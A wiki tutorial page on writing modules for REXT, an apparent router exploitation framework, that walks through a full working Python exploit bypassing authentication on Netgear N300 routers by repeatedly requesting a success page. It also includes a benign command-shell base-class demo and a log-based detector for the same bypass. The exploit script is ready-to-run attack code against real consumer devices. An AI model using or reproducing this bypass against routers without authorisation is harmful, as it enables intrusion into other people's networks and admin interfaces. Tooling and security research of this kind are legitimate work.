Ján Trenčanský edited this page Dec 13, 2015 · 1 revision

Creating module for REXT

In REXT there are so far 5 types of modules you can create:

  • decryptors - modules that interact with firmware images or config files
  • exploits - modules that exploit a certain vulnerability of an embedded device
  • harvesters - modules used to harvest data from a device, usually after valid credentials have been provided
  • scanners - modules that scan for a certain vulnerability or perform service discovery
  • misc - anything that doesn't fit in the above, like password generators etc.

Every one of these types has a corresponding super class in the core folder from which modules of that type inherit. These super classes usually contain the basic methods a module should have, or that it can build upon. You can think of them as templates.

You can create your own type of module by adding a folder that follows the REXT type/vendor/module convention to the module folder and by adding a super class template to the core folder.

I'll show you how to create a simple exploit that is actually part of REXT.

# Name: Netgear N300 authentication bypass
# File: n300_auth_bypass.py
# Author: Ján Trenčanský
# License: GNU GPL v3
# Created: 16.11.2015
# Last modified: 16.11.2015
# Shodan Dork:
# Description: Bypasses router authentication on Netgear N300 with firmware N300_1.1.0.31_1.0.1.img
#  or N300-1.1.0.28_1.0.1.img other devices may be vulnerable as well
# Based on: http://www.csnc.ch/misc/files/advisories/CSNC-2015-007_Netgear_WNR1000v4_AuthBypass.txt

import core.Exploit


class Exploit(core.Exploit.RextExploit):
    def __init__(self):
        core.Exploit.RextExploit.__init__(self)

    def do_run(self, e):
        pass

Exploit()

Your new Exploit class inherits from core.Exploit.RextExploit. This takes care of things like command prompt initialization, the exit command, a basic set command for the host and port properties with validation in place, and the host and port commands that print their current values. Since we are writing an exploit for an embedded device, it's safe to assume we'll need to define host and port. It also creates basic help for all the commands mentioned above.

As you can see from the snippet above, you define the class and then instantiate it via Exploit(). This is necessary for the script to execute itself and create a command prompt.

run is the command that executes the loaded module. For your module to do something you need to override do_run(self, e). Every method that you want to be invokable as a command has to start with the do_ prefix. Check the documentation of Python's cmd module for further information if necessary. Exploits can be written entirely in do_run if they are short, or you can create additional methods and functions.
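To make the do_ convention concrete, here is an added, self-contained stand-in for what the page says the base class provides (command prompt, set with validation, host and port commands, exit, help). It is example code written for this page, not REXT's own core/Exploit.py; the class name RextExploitDemo, the default host and port, and the validation rules (IP literal only, port 1..65535) are assumptions.

```python
import cmd
import ipaddress

def valid_host(value):
    # assumed rule: accept only an IPv4 or IPv6 literal
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False

def valid_port(value):
    # assumed rule: decimal TCP port in 1..65535
    return value.isdigit() and 0 < int(value) < 65536

class RextExploitDemo(cmd.Cmd):
    prompt = "rext(demo) > "

    def __init__(self):
        super().__init__()
        self.host = "192.168.1.1"  # defaults are assumptions
        self.port = "80"  # a string, so "http://" + host + ":" + port works

    def do_set(self, e):
        """set <host|port> <value>  (cmd prints this docstring for 'help set')"""
        parts = e.split()
        if len(parts) != 2:
            print("usage: set <host|port> <value>")
        elif parts[0] == "host" and valid_host(parts[1]):
            self.host = parts[1]
        elif parts[0] == "port" and valid_port(parts[1]):
            self.port = parts[1]
        else:
            print("invalid property or value")

    def do_host(self, e):  # 'host' command: print the current value
        print(self.host)

    def do_port(self, e):
        print(self.port)

    def do_run(self, e):  # modules override this with their real work
        print("nothing to run")

    def do_exit(self, e):  # returning True ends cmdloop()
        return True

if __name__ == "__main__":
    RextExploitDemo().cmdloop()  # the page's Exploit() call plays this role
```

Typing "help" at the prompt lists every do_ method as a command, which is why the prefix matters.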

Now let's add the actual exploit. First, let's consider what we are going to need. The exploit uses a vulnerability in the device's web frontend, so we'll need to import requests. I do not recommend using the urllib module: requests is a REXT dependency, will suffice for 99% of what you need, and is much more readable.

We'll also want to print the status of our exploit to the console. For this we'll import print_error, print_success and print_yellow from interface.messages. These functions wrap your string in escape sequences that colour the output. For now it may seem a bit unnecessary, as an ordinary print() would do just fine, but in the future logging may be implemented in them.

Colours follow this convention:

  • green - success
  • yellow - warning
  • red - error
  • purple - help
  • blue - information

For this particular exploit the time module will also be needed.

# Name: Netgear N300 authentication bypass
# File: n300_auth_bypass.py
# Author: Ján Trenčanský
# License: GNU GPL v3
# Created: 16.11.2015
# Last modified: 16.11.2015
# Shodan Dork:
# Description: Bypasses router authentication on Netgear N300 with firmware N300_1.1.0.31_1.0.1.img
#  or N300-1.1.0.28_1.0.1.img other devices may be vulnerable as well
# Based on: http://www.csnc.ch/misc/files/advisories/CSNC-2015-007_Netgear_WNR1000v4_AuthBypass.txt

import time
import requests

import core.Exploit

from interface.messages import print_error, print_success, print_yellow


class Exploit(core.Exploit.RextExploit):
    def __init__(self):
        core.Exploit.RextExploit.__init__(self)

    def do_run(self, e):
        target = "http://" + self.host + ":" + self.port
        try:
            response = requests.get(target, timeout=60)
            if response.status_code == requests.codes.unauthorized:
                print_yellow("Password protection detected")
                for i in range(0, 3):
                    time.sleep(1)
                    requests.get(target+"/BRS_netgear_success.html", timeout=60)
                response = requests.get(target, timeout=60)
                if response.status_code == requests.codes.ok:
                    print_success("bypass successful. Now use your browser to have a look at the admin interface.")

        except requests.RequestException:
            print_error("timeout!")

Exploit()

The exploit itself is pretty self-explanatory. You can check the original in the link from the header.
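From the defending side, the request sequence above leaves a recognisable trace: a 401 on /, a few hits on /BRS_netgear_success.html, then a 200 on / from the same client. The following is an added detection example, not part of REXT or the original advisory; it assumes the device or a proxy in front of it records requests in common log format, and the log lines are constructed for the demo.

```python
import re
from collections import defaultdict

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# constructed access-log lines in common log format (not real device logs)
SAMPLE_LOG = """\
10.0.0.7 - - [16/Nov/2015:10:00:01 +0000] "GET / HTTP/1.1" 401 0
10.0.0.7 - - [16/Nov/2015:10:00:02 +0000] "GET /BRS_netgear_success.html HTTP/1.1" 200 512
10.0.0.7 - - [16/Nov/2015:10:00:03 +0000] "GET /BRS_netgear_success.html HTTP/1.1" 200 512
10.0.0.7 - - [16/Nov/2015:10:00:04 +0000] "GET /BRS_netgear_success.html HTTP/1.1" 200 512
10.0.0.7 - - [16/Nov/2015:10:00:05 +0000] "GET / HTTP/1.1" 200 2048
10.0.0.9 - - [16/Nov/2015:10:01:00 +0000] "GET / HTTP/1.1" 401 0
10.0.0.9 - - [16/Nov/2015:10:01:02 +0000] "GET / HTTP/1.1" 401 0
"""

def find_bypass_attempts(log_text):
    """Return clients whose requests show: 401 on /, then one or more hits on
    /BRS_netgear_success.html, then 200 on /, in that order."""
    state = defaultdict(int)  # per client: 0 nothing, 1 saw 401, 2 saw success page
    flagged = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        client, _method, path, status = m.groups()
        if path == "/" and status == "401":
            state[client] = max(state[client], 1)
        elif path == "/BRS_netgear_success.html" and state[client] >= 1:
            state[client] = 2
        elif path == "/" and status == "200" and state[client] == 2:
            if client not in flagged:
                flagged.append(client)
    return flagged
```

A client that only keeps receiving 401s (10.0.0.9 in the sample) is not flagged; only the full sequence is.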
